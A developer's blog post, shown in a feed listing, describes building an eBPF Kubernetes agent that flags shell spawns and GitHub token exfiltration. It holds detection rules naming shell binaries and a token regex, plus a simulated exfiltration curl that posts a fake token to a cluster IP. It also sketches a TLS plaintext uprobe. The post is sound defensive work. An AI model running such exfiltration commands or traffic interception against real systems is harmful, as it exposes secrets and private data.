DEV Community: Karan Desai The latest articles on DEV Community by Karan Desai (@karandesai2005). https://dev.to/karandesai2005 https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F4000250%2F133daeee-76fc-4a32-bc15-519c5b8e2701.png DEV Community: Karan Desai https://dev.to/karandesai2005 en I Built an eBPF Security Agent That Catches GitHub PAT Exfiltration at the Kernel Level Karan Desai Wed, 24 Jun 2026 09:32:07 +0000 https://dev.to/karandesai2005/i-built-an-ebpf-security-agent-that-catches-github-pat-exfiltration-at-the-kernel-level-1c3k https://dev.to/karandesai2005/i-built-an-ebpf-security-agent-that-catches-github-pat-exfiltration-at-the-kernel-level-1c3k <h1> I Built an eBPF Security Agent That Catches GitHub PAT Exfiltration at the Kernel Level </h1> <p><em>From zero eBPF experience to reading raw HTTP payloads out of kernel memory</em></p> <p>I wanted to understand how runtime security tools like Falco and Tetragon actually work — not just use them, but build something from scratch that does what they do.</p> <p>So I built <strong>krato</strong> — an eBPF-powered Kubernetes security agent that detects malicious processes and GitHub PAT exfiltration at the kernel level, with detection rules written in OPA Rego.</p> <p>Here's everything I learned.</p> <h2> What even is eBPF? </h2> <p>Your Linux machine has two zones:</p> <p><strong>User space</strong> — everything you interact with. Your browser, terminal, apps.</p> <p><strong>Kernel space</strong> — the OS core. Every time an app wants to do anything — open a file, spawn a process, send network data — it asks the kernel via a <strong>syscall</strong>.</p> <p>eBPF lets you inject a tiny sandboxed program <strong>directly into the Linux kernel</strong> that runs every time a specific event happens. Every process spawn. Every network packet. At near-zero overhead.</p> <p>For security, this changes everything. Traditional tools match <strong>signatures</strong> — known bad patterns. If the attack is new, no signature exists, it gets through.</p> <p>eBPF watches <strong>behavior</strong>. It doesn't need to know what the attack is. It watches what every process <em>does</em> at the kernel level. A container that spawns a bash shell and makes an outbound network call — suspicious regardless of whether a CVE exists.</p> <h2> The architecture </h2> <p>Two parallel detection pipelines, one rule engine:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>┌─────────────────────────────────────────────┐ │ Linux Kernel │ │ │ │ execve() tcp_sendmsg() │ │ (process spawn) (outbound TCP) │ └──────┬─────────────────────────┬────────────┘ │ │ ▼ ▼ ┌─────────┐ ┌──────────────┐ │Tetragon │ │ dpi.c │ │(eBPF) │ │ (custom │ │ │ │ eBPF C) │ └────┬────┘ └──────┬───────┘ │ │ └──────────┬─────────────┘ ▼ ┌────────────┐ │ Go Agent │ └─────┬──────┘ │ ▼ ┌──────────────┐ ┌─────────────────┐ │ OPA Engine │◄───│ Rego Policies │ └──────┬───────┘ │ process.rego │ │ │ network.rego │ ▼ └─────────────────┘ 🚨 Alert </code></pre> </div> <p>Three components:</p> <ul> <li> <strong>Tetragon</strong> — Cilium's eBPF tool for process event detection, streams structured events over gRPC</li> <li> <strong>dpi.c</strong> — custom eBPF C program I wrote that hooks <code>tcp_sendmsg</code> and reads raw payload bytes</li> <li> <strong>OPA + Rego</strong> — rule engine so detection logic lives in text files, not compiled code</li> </ul> <h2> Setting up the cluster </h2> <p>I used Kind (Kubernetes in Docker) to spin up a local cluster:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kind create cluster <span class="nt">--name</span> ebpf-agent helm repo add cilium https://helm.cilium.io helm <span class="nb">install </span>tetragon cilium/tetragon <span class="nt">-n</span> kube-system </code></pre> </div> <p>Key insight — <strong>Kind containers share your host machine's Linux kernel</strong>. There is no separate cluster kernel. This is why eBPF programs loaded inside Kind see processes on your actual laptop. Containers are not VMs.</p> <p>I verified Tetragon was working by tailing its export log:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kubectl logs <span class="nt">-n</span> kube-system &lt;tetragon-pod&gt; <span class="nt">-c</span> export-stdout | <span class="nb">head</span> <span class="nt">-20</span> </code></pre> </div> <p>Immediately fascinating — I could see my own Hyprland keyboard layout scripts firing every few seconds, with full process trees, arguments, UIDs, and nanosecond timestamps. The kernel sees <em>everything</em>.</p> <h2> Part 1 — Malicious Process Detection </h2> <h3> The OPA engine </h3> <p>Instead of hardcoding detection logic in Go, I put all rules in <code>.rego</code> files. The Go agent just asks OPA: <em>"does this event violate any rules?"</em></p> <p>Add a new detection rule → drop a <code>.rego</code> file. No code changes, no rebuild.</p> <p>My first Rego rule:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rego"><code><span class="ow">package</span> <span class="n">agent</span><span class="p">.</span><span class="n">process</span> <span class="n">deny</span><span class="p">[</span><span class="n">msg</span><span class="p">]</span> <span class="n">if</span> <span class="p">{</span> <span class="n">input</span><span class="p">.</span><span class="n">type</span> <span class="o">==</span> <span class="s2">"process_exec"</span> <span class="n">input</span><span class="p">.</span><span class="n">container</span><span class="p">.</span><span class="n">pod_name</span> <span class="p">!</span><span class="o">=</span> <span class="s2">""</span> <span class="c1"># only care about pods, not host processes</span> <span class="n">shell_binary</span><span class="p">(</span><span class="n">input</span><span class="p">.</span><span class="n">process</span><span class="p">.</span><span class="n">binary</span><span class="p">)</span> <span class="n">msg</span> <span class="o">:=</span> <span class="n">sprintf</span><span class="p">(</span> <span class="s2">"Shell spawned in pod [%s/%s] — binary: %s"</span><span class="p">,</span> <span class="p">[</span><span class="n">input</span><span class="p">.</span><span class="n">container</span><span class="p">.</span><span class="n">namespace</span><span class="p">,</span> <span class="n">input</span><span class="p">.</span><span class="n">container</span><span class="p">.</span><span class="n">pod_name</span><span class="p">,</span> <span class="n">input</span><span class="p">.</span><span class="n">process</span><span class="p">.</span><span class="n">binary</span><span class="p">]</span> <span class="p">)</span> <span class="p">}</span> <span class="n">shell_binary</span><span class="p">(</span><span class="n">b</span><span class="p">)</span> <span class="n">if</span> <span class="n">b</span> <span class="o">==</span> <span class="s2">"/bin/bash"</span> <span class="n">shell_binary</span><span class="p">(</span><span class="n">b</span><span class="p">)</span> <span class="n">if</span> <span class="n">b</span> <span class="o">==</span> <span class="s2">"/bin/sh"</span> <span class="n">shell_binary</span><span class="p">(</span><span class="n">b</span><span class="p">)</span> <span class="n">if</span> <span class="n">b</span> <span class="o">==</span> <span class="s2">"/usr/bin/bash"</span> </code></pre> </div> <h3> Wiring Tetragon gRPC </h3> <p>Tetragon exposes a <code>FineGuidanceSensors</code> gRPC service. The Go agent opens a persistent stream:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight go"><code><span class="n">client</span> <span class="o">:=</span> <span class="n">tetragonAPI</span><span class="o">.</span><span class="n">NewFineGuidanceSensorsClient</span><span class="p">(</span><span class="n">conn</span><span class="p">)</span> <span class="n">stream</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">client</span><span class="o">.</span><span class="n">GetEvents</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">tetragonAPI</span><span class="o">.</span><span class="n">GetEventsRequest</span><span class="p">{})</span> <span class="k">for</span> <span class="p">{</span> <span class="n">event</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">stream</span><span class="o">.</span><span class="n">Recv</span><span class="p">()</span> <span class="c">// parse → OPA → alert</span> <span class="p">}</span> </code></pre> </div> <p>One gotcha — Tetragon's Helm chart defaults to a Unix socket, not TCP. Fix:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>helm upgrade tetragon cilium/tetragon <span class="nt">-n</span> kube-system <span class="se">\</span> <span class="nt">--set</span> tetragon.grpc.address<span class="o">=</span><span class="s2">"localhost:54321"</span> </code></pre> </div> <h3> The test </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kubectl run test-nginx <span class="nt">--image</span><span class="o">=</span>nginx <span class="nt">--restart</span><span class="o">=</span>Never kubectl <span class="nb">exec</span> <span class="nt">-it</span> test-nginx <span class="nt">--</span> /bin/bash </code></pre> </div> <p>The moment I hit enter:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="err">🚨</span><span class="w"> </span><span class="err">━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</span><span class="w"> </span><span class="err">ALERT</span><span class="w"> </span><span class="err">—</span><span class="w"> </span><span class="err">process_exec</span><span class="w"> </span><span class="err">🚨</span><span class="w"> </span><span class="err">━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</span><span class="w"> </span><span class="err">→</span><span class="w"> </span><span class="err">Shell</span><span class="w"> </span><span class="err">spawned</span><span class="w"> </span><span class="err">in</span><span class="w"> </span><span class="err">pod</span><span class="w"> </span><span class="p">[</span><span class="err">default/test-nginx</span><span class="p">]</span><span class="w"> </span><span class="err">—</span><span class="w"> </span><span class="err">binary:</span><span class="w"> </span><span class="err">/bin/bash</span><span class="w"> </span><span class="err">binary:</span><span class="w"> </span><span class="err">/bin/bash</span><span class="w"> </span><span class="err">parent:</span><span class="w"> </span><span class="err">/usr/local/bin/containerd-shim-runc-v</span><span class="mi">2</span><span class="w"> </span><span class="err">uid:</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="err">pod:</span><span class="w"> </span><span class="err">default/test-nginx</span><span class="w"> </span><span class="err">raw</span><span class="w"> </span><span class="err">event:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"container"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"test-nginx"</span><span class="p">,</span><span class="w"> </span><span class="nl">"namespace"</span><span class="p">:</span><span class="w"> </span><span class="s2">"default"</span><span class="p">,</span><span class="w"> </span><span class="nl">"pod_name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"test-nginx"</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"process"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"binary"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/bin/bash"</span><span class="p">,</span><span class="w"> </span><span class="nl">"uid"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="nl">"pid"</span><span class="p">:</span><span class="w"> </span><span class="mi">396155</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"process_exec"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="err">━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</span><span class="w"> </span></code></pre> </div> <p>Real kernel event. Real alert. End to end.</p> <p><em>(Screenshot: agent terminal showing red alert for shell-in-nginx)</em></p> <h2> Part 2 — Deep Packet Inspection for GitHub PAT Exfiltration </h2> <p>This is where it got genuinely hard.</p> <h3> Why Tetragon wasn't enough </h3> <p>Tetragon tells you a process made a network connection. It doesn't show you the payload — the actual bytes sent. To detect a GitHub PAT (<code>ghp_*</code>) inside an outbound HTTP request, I needed to read the raw data.</p> <p>Solution: write my own eBPF program in C.</p> <h3> How tcp_sendmsg works </h3> <p>Every time any process sends TCP data, the kernel calls:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="kt">int</span> <span class="nf">tcp_sendmsg</span><span class="p">(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">sk</span><span class="p">,</span> <span class="k">struct</span> <span class="n">msghdr</span> <span class="o">*</span><span class="n">msg</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">size</span><span class="p">);</span> </code></pre> </div> <p>The <code>msghdr</code> contains a <code>msg_iter</code> — an iterator over the bytes being sent. By hooking this function with a kprobe and reading that iterator, I can see the payload <strong>before it leaves the machine</strong>.</p> <h3> Writing the eBPF C program — what I learned </h3> <p><strong>1. Generate vmlinux.h from your kernel's BTF data</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>bpftool btf dump file /sys/kernel/btf/vmlinux format c <span class="o">&gt;</span> ebpf/vmlinux.h </code></pre> </div> <p>This gives you all kernel struct definitions for your exact kernel. 159,000 lines. You need this instead of individual kernel headers.</p> <p><strong>2. Kernel 6.18 uses ITER_UBUF — this was the critical bug</strong></p> <p>The <code>msg_iter</code> has an <code>iter_type</code> field. On older kernels, iterators are always <code>ITER_IOVEC</code> (type 1). On kernel 6.18, curl and most send() calls use <code>ITER_UBUF</code> (type 0) — a simpler single-buffer iterator.</p> <p>My original code only handled <code>ITER_IOVEC</code>. Nothing was being read. Fixed by branching on <code>iter_type</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="n">iter_type</span> <span class="o">=</span> <span class="n">BPF_CORE_READ</span><span class="p">(</span><span class="n">msg</span><span class="p">,</span> <span class="n">msg_iter</span><span class="p">.</span><span class="n">iter_type</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">iter_type</span> <span class="o">==</span> <span class="n">ITER_IOVEC</span><span class="p">)</span> <span class="p">{</span> <span class="n">iov_ptr</span> <span class="o">=</span> <span class="n">BPF_CORE_READ</span><span class="p">(</span><span class="n">msg</span><span class="p">,</span> <span class="n">msg_iter</span><span class="p">.</span><span class="n">__iov</span><span class="p">);</span> <span class="c1">// read from iov_ptr-&gt;iov_base + iov_offset</span> <span class="p">}</span> <span class="k">else</span> <span class="nf">if</span> <span class="p">(</span><span class="n">iter_type</span> <span class="o">==</span> <span class="n">ITER_UBUF</span><span class="p">)</span> <span class="p">{</span> <span class="n">ubuf</span> <span class="o">=</span> <span class="n">BPF_CORE_READ</span><span class="p">(</span><span class="n">msg</span><span class="p">,</span> <span class="n">msg_iter</span><span class="p">.</span><span class="n">ubuf</span><span class="p">);</span> <span class="c1">// read directly from ubuf + iov_offset</span> <span class="p">}</span> </code></pre> </div> <p><strong>3. The &amp; 511 mask bug</strong></p> <p>When reading payload bytes:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="c1">// DANGEROUS</span> <span class="n">bpf_probe_read_user</span><span class="p">(</span><span class="n">event</span><span class="o">-&gt;</span><span class="n">payload</span><span class="p">,</span> <span class="n">event</span><span class="o">-&gt;</span><span class="n">payload_len</span> <span class="o">&amp;</span> <span class="p">(</span><span class="n">MAX_PAYLOAD_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">),</span> <span class="n">src</span><span class="p">);</span> </code></pre> </div> <p>When <code>payload_len == 512</code> and <code>MAX_PAYLOAD_SIZE == 512</code>: <code>512 &amp; 511 = 0</code>. Reading zero bytes. Fixed:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="n">__u32</span> <span class="n">read_len</span> <span class="o">=</span> <span class="n">count</span> <span class="o">&gt;</span> <span class="n">MAX_PAYLOAD_SIZE</span> <span class="o">?</span> <span class="n">MAX_PAYLOAD_SIZE</span> <span class="o">:</span> <span class="p">(</span><span class="n">__u32</span><span class="p">)</span><span class="n">count</span><span class="p">;</span> </code></pre> </div> <p><strong>4. Use BPF_CORE_READ everywhere</strong></p> <p>Direct struct field access breaks across kernel versions. <code>BPF_CORE_READ</code> uses CO-RE for safe cross-kernel compatibility:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="n">count</span> <span class="o">=</span> <span class="n">BPF_CORE_READ</span><span class="p">(</span><span class="n">msg</span><span class="p">,</span> <span class="n">msg_iter</span><span class="p">.</span><span class="n">count</span><span class="p">);</span> <span class="n">iov_offset</span> <span class="o">=</span> <span class="n">BPF_CORE_READ</span><span class="p">(</span><span class="n">msg</span><span class="p">,</span> <span class="n">msg_iter</span><span class="p">.</span><span class="n">iov_offset</span><span class="p">);</span> </code></pre> </div> <p><strong>5. Try user memory first, fall back to kernel</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="k">static</span> <span class="n">__always_inline</span> <span class="kt">long</span> <span class="nf">read_memory</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">dst</span><span class="p">,</span> <span class="n">__u32</span> <span class="n">len</span><span class="p">,</span> <span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="n">src</span><span class="p">)</span> <span class="p">{</span> <span class="kt">long</span> <span class="n">ret</span> <span class="o">=</span> <span class="n">bpf_probe_read_user</span><span class="p">(</span><span class="n">dst</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="n">src</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="n">ret</span> <span class="o">=</span> <span class="n">bpf_probe_read_kernel</span><span class="p">(</span><span class="n">dst</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="n">src</span><span class="p">);</span> <span class="k">return</span> <span class="n">ret</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <h3> Compiling and loading </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>clang <span class="nt">-O2</span> <span class="nt">-g</span> <span class="nt">-target</span> bpf <span class="se">\</span> <span class="nt">-D__TARGET_ARCH_x86</span> <span class="se">\</span> <span class="nt">-I</span> ebpf/ <span class="se">\</span> <span class="nt">-c</span> ebpf/dpi.c <span class="se">\</span> <span class="nt">-o</span> internal/dpi/dpi_bpf.o </code></pre> </div> <p>The Go agent loads this at runtime using <code>cilium/ebpf</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight go"><code><span class="n">spec</span><span class="p">,</span> <span class="n">_</span> <span class="o">:=</span> <span class="n">ebpf</span><span class="o">.</span><span class="n">LoadCollectionSpec</span><span class="p">(</span><span class="s">"internal/dpi/dpi_bpf.o"</span><span class="p">)</span> <span class="n">coll</span><span class="p">,</span> <span class="n">_</span> <span class="o">:=</span> <span class="n">ebpf</span><span class="o">.</span><span class="n">NewCollection</span><span class="p">(</span><span class="n">spec</span><span class="p">)</span> <span class="n">kp</span><span class="p">,</span> <span class="n">_</span> <span class="o">:=</span> <span class="n">link</span><span class="o">.</span><span class="n">Kprobe</span><span class="p">(</span><span class="s">"tcp_sendmsg"</span><span class="p">,</span> <span class="n">coll</span><span class="o">.</span><span class="n">Programs</span><span class="p">[</span><span class="s">"kprobe_tcp_sendmsg"</span><span class="p">],</span> <span class="no">nil</span><span class="p">)</span> <span class="n">rd</span><span class="p">,</span> <span class="n">_</span> <span class="o">:=</span> <span class="n">ringbuf</span><span class="o">.</span><span class="n">NewReader</span><span class="p">(</span><span class="n">coll</span><span class="o">.</span><span class="n">Maps</span><span class="p">[</span><span class="s">"events"</span><span class="p">])</span> </code></pre> </div> <h3> The moment it worked </h3> <p>Inside the nginx container:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="nt">-X</span> POST http://10.244.0.7:8080 <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'token=ghp_1234567890abcdefghijklmnopqrstuvwxyz'</span> </code></pre> </div> <p>Agent terminal:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 🔑 CRITICAL — GitHub PAT EXFILTRATION DETECTED ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ PID: 397417 Process: curl Payload: </span><span class="nf">POST</span> <span class="nn">/</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="na">Host</span><span class="p">:</span> <span class="s">10.244.0.7:8080</span> <span class="na">User-Agent</span><span class="p">:</span> <span class="s">curl/8.14.1</span> <span class="na">Content-Type</span><span class="p">:</span> <span class="s">application/x-www-form-urlencoded</span> token=ghp_1234567890abcdefghijklmnopqrstuvwxyz ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ </code></pre> </div> <p>My eBPF program read the raw HTTP payload from kernel memory and surfaced the PAT before the data left the machine.</p> <p>Something interesting — the same PAT appeared at multiple layers:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>🔑 CRITICAL — GitHub PAT EXFILTRATION DETECTED PID: 2079 Process: containerd ← caught at container runtime level 🔑 CRITICAL — GitHub PAT EXFILTRATION DETECTED PID: 397417 Process: curl ← caught in the actual HTTP payload </code></pre> </div> <p>That's kernel-level visibility. The same secret surfaced at every layer of the stack.</p> <p><em>(Screenshot: terminal showing both alerts firing)</em></p> <h2> Why OPA Rego makes this production-ready </h2> <p>Detection logic lives entirely in <code>.rego</code> files — not Go code.</p> <p>Adding a new detection rule:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rego"><code><span class="n">deny</span><span class="p">[</span><span class="n">msg</span><span class="p">]</span> <span class="n">if</span> <span class="p">{</span> <span class="n">input</span><span class="p">.</span><span class="n">type</span> <span class="o">==</span> <span class="s2">"network_connect"</span> <span class="n">input</span><span class="p">.</span><span class="n">container</span><span class="p">.</span><span class="n">pod_name</span> <span class="p">!</span><span class="o">=</span> <span class="s2">""</span> <span class="n">regex</span><span class="p">.</span><span class="n">match</span><span class="p">(</span><span class="err">`</span><span class="n">ghp_</span><span class="p">[</span><span class="n">A</span><span class="o">-</span><span class="n">Za</span><span class="o">-</span><span class="n">z0</span><span class="m">-9</span><span class="p">]{</span><span class="m">36</span><span class="p">}</span><span class="err">`</span><span class="p">,</span> <span class="n">input</span><span class="p">.</span><span class="n">network</span><span class="p">.</span><span class="n">payload</span><span class="p">)</span> <span class="n">msg</span> <span class="o">:=</span> <span class="n">sprintf</span><span class="p">(</span><span class="s2">"GitHub PAT detected → %s"</span><span class="p">,</span> <span class="p">[</span><span class="n">input</span><span class="p">.</span><span class="n">network</span><span class="p">.</span><span class="n">dest_ip</span><span class="p">])</span> <span class="p">}</span> </code></pre> </div> <p>Drop the file. Agent picks it up on restart. Security teams write and audit rules without touching Go. Rules are version-controlled and diffable like any other code.</p> <p>Same pattern production tools use — Falco's rules language, Tetragon's TracingPolicy CRDs. Separate detection logic from detection infrastructure.</p> <h2> What I'd build next </h2> <p><strong>SSL uprobe for HTTPS traffic</strong></p> <p>The current DPI only catches unencrypted HTTP. For HTTPS, data is encrypted before <code>tcp_sendmsg</code> sees it.</p> <p>Fix: attach a uprobe to <code>SSL_write</code> in <code>libssl.so</code>. This function is called with <strong>plaintext data before encryption</strong>. Hook it there and you can read TLS payloads. This is how Pixie and Hubble do production DPI.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">uprobes</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">path</span><span class="pi">:</span> <span class="s2">"</span><span class="s">/usr/lib/x86_64-linux-gnu/libssl.so.3"</span> <span class="na">symbol</span><span class="pi">:</span> <span class="s2">"</span><span class="s">SSL_write"</span> <span class="na">args</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">index</span><span class="pi">:</span> <span class="m">1</span> <span class="na">type</span><span class="pi">:</span> <span class="s2">"</span><span class="s">char_buf"</span> <span class="na">sizeArgIndex</span><span class="pi">:</span> <span class="m">2</span> </code></pre> </div> <p><strong>Threat intel feed integration</strong></p> <p>Pull known bad IPs from OTX or MISP into OPA as external data. Rules check destination IPs against a live feed — zero Go changes needed.</p> <p><strong>Policy hot-reload</strong></p> <p>Use <code>inotify</code> to watch the policies directory. <code>.rego</code> file changes → reload OPA engine in place. Zero downtime rule updates.</p> <h2> Key takeaways </h2> <p>Runtime security is fundamentally about being <strong>as close to the kernel as possible</strong>. Signatures and logs are too slow, too far from the action. eBPF puts detection where events actually happen — at syscall time, before data leaves the machine.</p> <p>The specific lessons:</p> <ul> <li>Kernel 6.18 changed <code>iov_iter</code> to prefer <code>ITER_UBUF</code> — always branch on <code>iter_type</code> </li> <li>Use <code>BPF_CORE_READ</code> for CO-RE compatibility across kernel versions </li> <li>The <code>&amp; (MAX_PAYLOAD_SIZE - 1)</code> pattern is dangerous when payload equals buffer size exactly</li> <li> <code>bpf_probe_read_user</code> with kernel fallback covers most memory access patterns</li> <li>Kind shares the host kernel — eBPF programs see everything, not just cluster processes</li> </ul> <h2> The repo </h2> <p>Full project open source at <strong>github.com/karandesai2005/krato</strong></p> <p>Includes: eBPF C program with full ITER_UBUF/ITER_IOVEC handling, OPA Rego rules for process detection and DPI, Tetragon gRPC listener, Kind cluster setup scripts, architecture diagram.</p> <p><em>Karan Desai — security engineer, final year CS at SIT Pune. Metasploit Framework contributor. IEEE SA Cybersecurity Hackathon 2026 — 1st place, 190 teams, 34 countries. Active bug bounty researcher on Bugcrowd.</em></p> <p><em>GitHub: github.com/karandesai2005 | Portfolio: karan-desai.vercel.app</em></p> kubernetes linux security showdev